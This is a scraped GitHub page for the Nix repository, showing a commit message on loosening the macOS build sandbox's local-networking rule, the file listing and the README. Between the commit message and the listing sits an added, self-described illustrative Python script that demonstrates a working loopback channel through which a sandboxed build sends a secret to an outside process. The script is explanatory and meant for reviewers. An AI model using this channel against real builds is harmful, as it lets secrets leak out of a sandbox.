Andrew Marshall 00f6db36fd libstore: fix port binding in __darwinAllowLocalNetworking sandbox
In d60c3f7f7c, this was changed to close a
hole in the sandbox. Unfortunately, this was too restrictive such that it
made local port binding fail, thus making derivations that needed
`__darwinAllowLocalNetworking` gain nearly nothing, and thus largely
fail (as the primary use for it is to enable port binding).

This unfortunately does mean that a sandboxed build process can, in
coordination with an actor outside the sandbox, escape the sandbox by
binding a port and connecting to it externally to send data. I do not
see a way around this with my experimentation and understanding of the
(quite undocumented) macOS sandbox profile API. Notably it seems not
possible to use the sandbox to do any of:

- Restrict the remote IP of inbound network requests
- Restrict the address being bound to

As such, the `(local ip "*:*")` here appears to be functionally no
different than `(local ip "localhost:*")` (however it *should* be
different than removing the filter entirely, as that would make it also
apply to non-IP networking). Doing `(allow network-inbound (require-all
(local ip "localhost:*") (remote ip "localhost:*")))` causes listening
to fail.

Note that `network-inbound` implies `network-bind`.
2024-08-08 14:31:26 -04:00
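The escape channel the commit message acknowledges can be shown concretely. The following is an added example, not Nix code and not the sandbox profile itself: it models two cooperating processes with plain sockets. The "inside" party does nothing beyond what `network-bind` plus `network-inbound` on loopback permits (bind, listen, accept, then read and write on the accepted connection), and the "outside" party connects to it from an unsandboxed context. The secret payload, the `PULL` request line and the ephemeral-port handoff through `port_box` are constructed for the demo; a real pair would agree on a fixed port out of band.

```python
"""
Loopback exfiltration channel that stays open when a build sandbox permits
inbound local networking (the __darwinAllowLocalNetworking case). Added
example: the builder/outside-actor split, the PULL request and the secret are
all constructed here for illustration.
"""
import socket
import threading


def sandboxed_builder(secret: bytes, ready: threading.Event, port_box: list) -> None:
    """Inside the sandbox. Only bind + listen + accept on loopback are needed;
    no outbound connection is ever made, so a rule that blocks
    network-outbound does not help."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))          # ephemeral port; constructed handoff below
    srv.listen(1)
    port_box.append(srv.getsockname()[1])
    ready.set()
    conn, _peer = srv.accept()          # the outside actor dials in
    with conn:
        request = conn.recv(64)
        if request == b"PULL\n":        # constructed one-line protocol
            conn.sendall(secret)        # data leaves the sandbox here
    srv.close()


def outside_actor(port: int) -> bytes:
    """Outside the sandbox: connect to the builder's port and drain what it sends."""
    chunks = []
    with socket.create_connection(("127.0.0.1", port), timeout=5) as c:
        c.sendall(b"PULL\n")
        c.shutdown(socket.SHUT_WR)
        while True:
            b = c.recv(4096)
            if not b:
                break
            chunks.append(b)
    return b"".join(chunks)


def run_channel(secret: bytes) -> bytes:
    """Run both halves in one process and return what the outside actor got."""
    ready = threading.Event()
    port_box: list = []
    t = threading.Thread(target=sandboxed_builder, args=(secret, ready, port_box), daemon=True)
    t.start()
    if not ready.wait(5) or not port_box:
        raise RuntimeError("builder never bound a port")
    data = outside_actor(port_box[0])
    t.join(5)
    return data


if __name__ == "__main__":
    print(run_channel(b"constructed build secret"))
```

The point for a reviewer of a derivation that sets `__darwinAllowLocalNetworking` is that, given the profile limitations described above, the setting should be treated as granting an arbitrary data channel to any local process, not merely the ability to run a test server; the remote address of the peer cannot be pinned by the sandbox, so the only control is deciding which derivations are allowed to request it.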
.github Merge remote-tracking branch 'origin/master' into flake-regressions 2024-07-22 16:03:45 +02:00
build-utils-meson add werror=suggest-override 2024-07-25 07:41:12 +02:00
config Remove and gitignore the autoreconf generated files 2024-03-02 10:18:47 +01:00
contrib function-trace: always show the trace 2019-09-18 23:23:21 +02:00
doc/manual Merge branch 'master' into rhendric/reference-manual-2 2024-08-07 15:25:02 -04:00
m4 Build a minimized Nix with MinGW 2024-04-17 12:26:10 -04:00
maintainers Factor out lookupExecutable and other PATH improvments 2024-08-07 18:12:58 -04:00
misc lint: fix shellcheck for misc/systemv/nix-daemon 2024-07-14 19:56:03 -07:00
mk makefiles: recognize GNU/Hurd 2024-07-30 05:29:32 +02:00
packaging dependencies: Centralize aws-sdk-cpp and sync with Nixpkgs 2024-07-27 02:16:05 +02:00
scripts Merge remote-tracking branch 'origin/master' into flake-regressions 2024-07-22 16:03:45 +02:00
src libstore: fix port binding in __darwinAllowLocalNetworking sandbox 2024-08-08 14:31:26 -04:00
tests Factor out lookupExecutable and other PATH improvments 2024-08-07 18:12:58 -04:00
.clang-format Factor out lookupExecutable and other PATH improvments 2024-08-07 18:12:58 -04:00
.clang-tidy Add .clang-tidy 2024-02-01 01:01:39 +01:00
.dir-locals.el .dir-locals.el: Set c-block-comment-prefix 2020-07-10 11:21:06 +02:00
.editorconfig No global eval settings in libnixexpr 2024-06-24 12:15:16 -04:00
.gitignore Stop vendoring toml11 2024-06-26 22:27:13 -04:00
.shellcheckrc housekeeping: shellcheck for tests/functional/ca/build-cache.sh 2024-06-12 17:41:16 -04:00
.version Bump version 2024-08-01 10:43:00 +02:00
CITATION.cff chore: PhD thesis as reference in CITATION.cff 2024-05-18 20:05:22 +02:00
configure.ac Add S3 opt dep to Meson, and simplify build 2024-07-22 11:11:38 -04:00
CONTRIBUTING.md manual: Contributing -> Development, Hacking -> Building (#9014) 2024-07-25 02:53:06 +00:00
COPYING * Change this to LGPL to keep the government happy. 2006-04-25 16:41:06 +00:00
default.nix add flake-compat to flake.nix and use sha256 in default.nix 2023-03-06 21:11:24 +01:00
docker.nix fix "add an option to include flake-registry..." 2023-05-16 14:35:31 +02:00
flake.lock Rename pre-commit-hooks -> git-hooks-nix 2024-07-24 15:55:57 +02:00
flake.nix Merge pull request #11170 from NixOS/release-notes-2.24 2024-07-31 17:06:49 +02:00
local.mk local.mk: Solve warnings 2024-04-17 15:37:14 +02:00
Makefile Merge pull request #11180 from Mic92/override-warnings 2024-07-25 03:00:50 -04:00
Makefile.config.in Port C API docs to Meson (#10936) 2024-06-19 22:43:54 +02:00
meson.build Progress on Wine CI support, MinGW dev shell with Meson (#10975) 2024-07-21 22:03:04 +00:00
package.nix package.nix: Empty build inputs if not doBuild 2024-07-27 02:39:55 +02:00
precompiled-headers.h Build a minimized Nix with MinGW 2024-04-17 12:26:10 -04:00
README.md docs: fix link to building instructions (#11207) 2024-07-28 13:34:48 +00:00
shell.nix Remove url literals 2022-01-24 13:28:21 +01:00

Nix


Nix is a powerful package manager for Linux and other Unix systems that makes package management reliable and reproducible. Please refer to the Nix manual for more details.

Installation and first steps

Visit nix.dev for installation instructions and beginner tutorials.

Full reference documentation can be found in the Nix manual.

Building and developing

Follow instructions in the Nix reference manual to set up a development environment and build Nix from source.

Contributing

Check the contributing guide if you want to get involved with developing Nix.

Additional resources

Nix was created by Eelco Dolstra and developed as the subject of his PhD thesis The Purely Functional Software Deployment Model, published 2006. Today, a world-wide developer community contributes to Nix and the ecosystem that has grown around it.

License

Nix is released under the LGPL v2.1.